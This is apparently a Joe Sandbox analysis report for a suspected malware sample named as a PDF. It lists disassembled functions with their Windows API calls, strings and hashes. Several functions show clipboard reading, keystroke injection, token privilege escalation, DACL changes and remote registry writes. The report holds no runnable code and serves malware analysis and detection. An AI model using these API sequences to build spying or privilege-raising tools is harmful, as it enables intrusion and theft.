                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                          • String ID: @GUI_DRAGID$F
                                                                          • API String ID: 3977979337-4164748364
                                                                          • Opcode ID: e998ded6ff886b6b931643079bb6e4d73a0e81e08c61a7495ca2053ae917be7e
                                                                          • Instruction ID: 65cac0c14c62787391df788a195744a092995d3958f239bdba3aade39e5d4809
                                                                          • Opcode Fuzzy Hash: e998ded6ff886b6b931643079bb6e4d73a0e81e08c61a7495ca2053ae917be7e
                                                                          • Instruction Fuzzy Hash: 96429E71604241AFD721CF28C884FBABFF5FF49314F144599F6A5872A0CB7AA854CB92
                                                                          Function 00B6804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00B6873F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: %d/%02d/%02d
                                                                          • API String ID: 3850602802-328681919
                                                                          • Opcode ID: f8df07780089b9dc4e9ac4c7d44311eec8563f425f10681d8c900dad27399601
                                                                          • Instruction ID: 0e257614d2dce70860726b26937c08bd4f850c6768891e7469ef8cce725e00ba
                                                                          • Opcode Fuzzy Hash: f8df07780089b9dc4e9ac4c7d44311eec8563f425f10681d8c900dad27399601
                                                                          • Instruction Fuzzy Hash: 8912A371500245ABEB259F24DC89FBA7BF8EF45710F2442A9F516EB2E1DF788941CB10
                                                                          Function 00AF710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$_memset
                                                                          • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                          • API String ID: 1357608183-1798697756
                                                                          • Opcode ID: 12a06636054fb3e1595841aba06b638b809985cb0325eee89822a5703444d4e6
                                                                          • Instruction ID: b30f73090db143864d6ee2929e4a0b3e8edc62ebc43d98b9174319b2bb2015b1
                                                                          • Opcode Fuzzy Hash: 12a06636054fb3e1595841aba06b638b809985cb0325eee89822a5703444d4e6
                                                                          • Instruction Fuzzy Hash: 90938075A04219DBDB24CF98C881BBDB7F1FF48710F3581AAE955AB290E7749E81CB40
                                                                          Function 00AE4A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetForegroundWindow.USER32(00000000,?), ref: 00AE4A3D
                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B1DA8E
                                                                          • IsIconic.USER32(?), ref: 00B1DA97
                                                                          • ShowWindow.USER32(?,00000009), ref: 00B1DAA4
                                                                          • SetForegroundWindow.USER32(?), ref: 00B1DAAE
                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B1DAC4
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00B1DACB
                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B1DAD7
                                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B1DAE8
                                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B1DAF0
                                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 00B1DAF8
                                                                          • SetForegroundWindow.USER32(?), ref: 00B1DAFB
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B1DB10
                                                                          • keybd_event.USER32(00000012,00000000), ref: 00B1DB1B
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B1DB25
                                                                          • keybd_event.USER32(00000012,00000000), ref: 00B1DB2A
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B1DB33
                                                                          • keybd_event.USER32(00000012,00000000), ref: 00B1DB38
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B1DB42
                                                                          • keybd_event.USER32(00000012,00000000), ref: 00B1DB47
                                                                          • SetForegroundWindow.USER32(?), ref: 00B1DB4A
                                                                          • AttachThreadInput.USER32(?,?,00000000), ref: 00B1DB71
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                          • String ID: Shell_TrayWnd
                                                                          • API String ID: 4125248594-2988720461
                                                                          • Opcode ID: 5170c2ad6c57b49d2be9e78baf10946d87bb92fb4e23be8c0624ef5dd727efd7
                                                                          • Instruction ID: ff32f942eb13787e8233a80b8d45891b77ca7824a4536b2d26283097e7bad926
                                                                          • Opcode Fuzzy Hash: 5170c2ad6c57b49d2be9e78baf10946d87bb92fb4e23be8c0624ef5dd727efd7
                                                                          • Instruction Fuzzy Hash: 27318571A44318BBEB206FA1AC49FBF3EACEB44B50F114075FA05E71D0CAB45D40EAA5
                                                                          Function 00B38858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00B38CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B38D0D
                                                                            • Part of subcall function 00B38CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B38D3A
                                                                            • Part of subcall function 00B38CC3: GetLastError.KERNEL32 ref: 00B38D47
                                                                          • _memset.LIBCMT ref: 00B3889B
                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00B388ED
                                                                          • CloseHandle.KERNEL32(?), ref: 00B388FE
                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B38915
                                                                          • GetProcessWindowStation.USER32 ref: 00B3892E
                                                                          • SetProcessWindowStation.USER32(00000000), ref: 00B38938
                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B38952
                                                                            • Part of subcall function 00B38713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B38851), ref: 00B38728
                                                                            • Part of subcall function 00B38713: CloseHandle.KERNEL32(?,?,00B38851), ref: 00B3873A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                          • String ID: $default$winsta0
                                                                          • API String ID: 2063423040-1027155976
                                                                          • Opcode ID: 72845919620ad0aef057ba9d4f2a006e76f893198148acb7e6b313e4dde9918e
                                                                          • Instruction ID: 13072239118e9e7f40ab46139530411afb88974499c6e7c5a234319a87411c61
                                                                          • Opcode Fuzzy Hash: 72845919620ad0aef057ba9d4f2a006e76f893198148acb7e6b313e4dde9918e
                                                                          • Instruction Fuzzy Hash: BB812971900309AFDF11DFA4EC45AEE7BB8EF04304F2841AAF910A62A1DF759E15DB61
                                                                          Function 00B5425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • OpenClipboard.USER32(00B6F910), ref: 00B54284
                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00B54292
                                                                          • GetClipboardData.USER32(0000000D), ref: 00B5429A
                                                                          • CloseClipboard.USER32 ref: 00B542A6
                                                                          • GlobalLock.KERNEL32(00000000), ref: 00B542C2
                                                                          • CloseClipboard.USER32 ref: 00B542CC
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00B542E1
                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00B542EE
                                                                          • GetClipboardData.USER32(00000001), ref: 00B542F6
                                                                          • GlobalLock.KERNEL32(00000000), ref: 00B54303
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00B54337
                                                                          • CloseClipboard.USER32 ref: 00B54447
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                          • String ID:
                                                                          • API String ID: 3222323430-0
                                                                          • Opcode ID: f898e9366878403de37825acb01d62df2fc7d8a50d5d41cc2854f5d85708eb03
                                                                          • Instruction ID: 4eb40aedcb5f46c42897ec9f7f58ac33aa571aeaa9046412a2ee294fb4a95d1f
                                                                          • Opcode Fuzzy Hash: f898e9366878403de37825acb01d62df2fc7d8a50d5d41cc2854f5d85708eb03
                                                                          • Instruction Fuzzy Hash: 54518B31204302ABD300AB61ED96F7F77A8AF84B05F1045A9F956D32E1DFB499488A62
                                                                          Function 00B4C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00B4C9F8
                                                                          • FindClose.KERNEL32(00000000), ref: 00B4CA4C
                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B4CA71
                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B4CA88
                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B4CAAF
                                                                          • __swprintf.LIBCMT ref: 00B4CAFB
                                                                          • __swprintf.LIBCMT ref: 00B4CB3E
                                                                            • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
                                                                          • __swprintf.LIBCMT ref: 00B4CB92
                                                                            • Part of subcall function 00B038D8: __woutput_l.LIBCMT ref: 00B03931
                                                                          • __swprintf.LIBCMT ref: 00B4CBE0
                                                                            • Part of subcall function 00B038D8: __flsbuf.LIBCMT ref: 00B03953
                                                                            • Part of subcall function 00B038D8: __flsbuf.LIBCMT ref: 00B0396B
                                                                          • __swprintf.LIBCMT ref: 00B4CC2F
                                                                          • __swprintf.LIBCMT ref: 00B4CC7E
                                                                          • __swprintf.LIBCMT ref: 00B4CCCD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                          • API String ID: 3953360268-2428617273
                                                                          • Opcode ID: 8f9a077289b595df7ff929e1610d08f12fb94825e75d216337a3b1ef52674b96
                                                                          • Instruction ID: 78910b52f230c9537afdbd0c2625c825374ea909d374181bbab965a3a9b50e0b
                                                                          • Opcode Fuzzy Hash: 8f9a077289b595df7ff929e1610d08f12fb94825e75d216337a3b1ef52674b96
                                                                          • Instruction Fuzzy Hash: 0EA14CB2508345ABC700EB65C986DAFB7ECFF94704F40496DF586C7191EA74DA08CB62
                                                                          Function 00B4F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B4F221
                                                                          • _wcscmp.LIBCMT ref: 00B4F236
                                                                          • _wcscmp.LIBCMT ref: 00B4F24D
                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00B4F25F
                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00B4F279
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00B4F291
                                                                          • FindClose.KERNEL32(00000000), ref: 00B4F29C
                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00B4F2B8
                                                                          • _wcscmp.LIBCMT ref: 00B4F2DF
                                                                          • _wcscmp.LIBCMT ref: 00B4F2F6
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B4F308
                                                                          • SetCurrentDirectoryW.KERNEL32(00B9A5A0), ref: 00B4F326
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B4F330
                                                                          • FindClose.KERNEL32(00000000), ref: 00B4F33D
                                                                          • FindClose.KERNEL32(00000000), ref: 00B4F34F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                          • String ID: *.*
                                                                          • API String ID: 1803514871-438819550
                                                                          • Opcode ID: 304922502741d2ae5afb325700ef7a18d4165bbc340aa0600bcc9c2bd780b665
                                                                          • Instruction ID: 30c41afcefcd2f3c8537e6fbd5529891706f8ce6539c0399842c92e57e236d01
                                                                          • Opcode Fuzzy Hash: 304922502741d2ae5afb325700ef7a18d4165bbc340aa0600bcc9c2bd780b665
                                                                          • Instruction Fuzzy Hash: 8B31AE7660121A6ADB10DFA4EC98AFE77ECEF08360F1401B6F814D30A0EB74DB459A64
                                                                          Function 00B60AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B60BDE
                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00B6F910,00000000,?,00000000,?,?), ref: 00B60C4C
                                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00B60C94
                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00B60D1D
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00B6103D
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00B6104A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Close$ConnectCreateRegistryValue
                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                          • API String ID: 536824911-966354055
                                                                          • Opcode ID: f8a20aa9f108082977a93f182f58caa6e60d641c9da0001b8b2c1a6f215fddc6
                                                                          • Instruction ID: fe340a4c3aa5d18d012c6033b2b4562b1ee7bd422a8f546f61f41ed3a8c0b548
                                                                          • Opcode Fuzzy Hash: f8a20aa9f108082977a93f182f58caa6e60d641c9da0001b8b2c1a6f215fddc6
                                                                          • Instruction Fuzzy Hash: 92025C756006519FCB14EF19C995E2AB7E5FF88714F04889DF88A9B3A2CB34ED41CB81
                                                                          Function 00B4F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B4F37E
                                                                          • _wcscmp.LIBCMT ref: 00B4F393
                                                                          • _wcscmp.LIBCMT ref: 00B4F3AA
                                                                            • Part of subcall function 00B445C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B445DC
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00B4F3D9
                                                                          • FindClose.KERNEL32(00000000), ref: 00B4F3E4
                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00B4F400
                                                                          • _wcscmp.LIBCMT ref: 00B4F427
                                                                          • _wcscmp.LIBCMT ref: 00B4F43E
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B4F450
                                                                          • SetCurrentDirectoryW.KERNEL32(00B9A5A0), ref: 00B4F46E
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B4F478
                                                                          • FindClose.KERNEL32(00000000), ref: 00B4F485
                                                                          • FindClose.KERNEL32(00000000), ref: 00B4F497
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                          • String ID: *.*
                                                                          • API String ID: 1824444939-438819550
                                                                          • Opcode ID: 2e918d395205c9884b0016fb77a050917a68dedcb236074f4e10a4e331923988
                                                                          • Instruction ID: d625a27210f19aa149cba2fde3ca8f08d449c8d6eb5072a8b081ee3b479c6ef8
                                                                          • Opcode Fuzzy Hash: 2e918d395205c9884b0016fb77a050917a68dedcb236074f4e10a4e331923988
                                                                          • Instruction Fuzzy Hash: FA319E7660121A6ACF10AFA4EC98AFE77ECDF49360F1401F6E854A31A0DB74DF44DA64
                                                                          Function 00B381F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00B3874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B38766
                                                                            • Part of subcall function 00B3874A: GetLastError.KERNEL32(?,00B3822A,?,?,?), ref: 00B38770
                                                                            • Part of subcall function 00B3874A: GetProcessHeap.KERNEL32(00000008,?,?,00B3822A,?,?,?), ref: 00B3877F
                                                                            • Part of subcall function 00B3874A: HeapAlloc.KERNEL32(00000000,?,00B3822A,?,?,?), ref: 00B38786
                                                                            • Part of subcall function 00B3874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B3879D
                                                                            • Part of subcall function 00B387E7: GetProcessHeap.KERNEL32(00000008,00B38240,00000000,00000000,?,00B38240,?), ref: 00B387F3
                                                                            • Part of subcall function 00B387E7: HeapAlloc.KERNEL32(00000000,?,00B38240,?), ref: 00B387FA
                                                                            • Part of subcall function 00B387E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B38240,?), ref: 00B3880B
                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B3825B
                                                                          • _memset.LIBCMT ref: 00B38270
                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B3828F
                                                                          • GetLengthSid.ADVAPI32(?), ref: 00B382A0
                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00B382DD
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B382F9
                                                                          • GetLengthSid.ADVAPI32(?), ref: 00B38316
                                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B38325
                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00B3832C
                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B3834D
                                                                          • CopySid.ADVAPI32(00000000), ref: 00B38354
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B38385
                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B383AB
                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B383BF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                          • String ID:
                                                                          • API String ID: 3996160137-0
                                                                          • Opcode ID: a72e9ef52b2e8cf014b41e543ba2992c544599d1672a5365134801e1a30423fc
                                                                          • Instruction ID: e409a53058b39dc83f745b6b45379fdc6c407f6401ab81ecde8a017d8f3b50d7
                                                                          • Opcode Fuzzy Hash: a72e9ef52b2e8cf014b41e543ba2992c544599d1672a5365134801e1a30423fc
                                                                          • Instruction Fuzzy Hash: 9C61677190020AEFCF009FA4DC85AEEBBB9FF04700F2481A9F815A7291DF759A05CB61
                                                                          Function 00AF6843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                          • API String ID: 0-4052911093
                                                                          • Opcode ID: b9df19ff244a47d86ce8a1f35f37d48de0e0a94bf7af0538aa7deea186774f10
                                                                          • Instruction ID: ce58ecf6435fd65798b4fbdf4c87ca66859ae5b7ac1160664f0070a2bec5bd3e
                                                                          • Opcode Fuzzy Hash: b9df19ff244a47d86ce8a1f35f37d48de0e0a94bf7af0538aa7deea186774f10
                                                                          • Instruction Fuzzy Hash: CB724F75E00219DBDB24CF99C8807BEB7F5EF48710F2485AAE949EB290DB749D41CB90
                                                                          Function 00B60665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
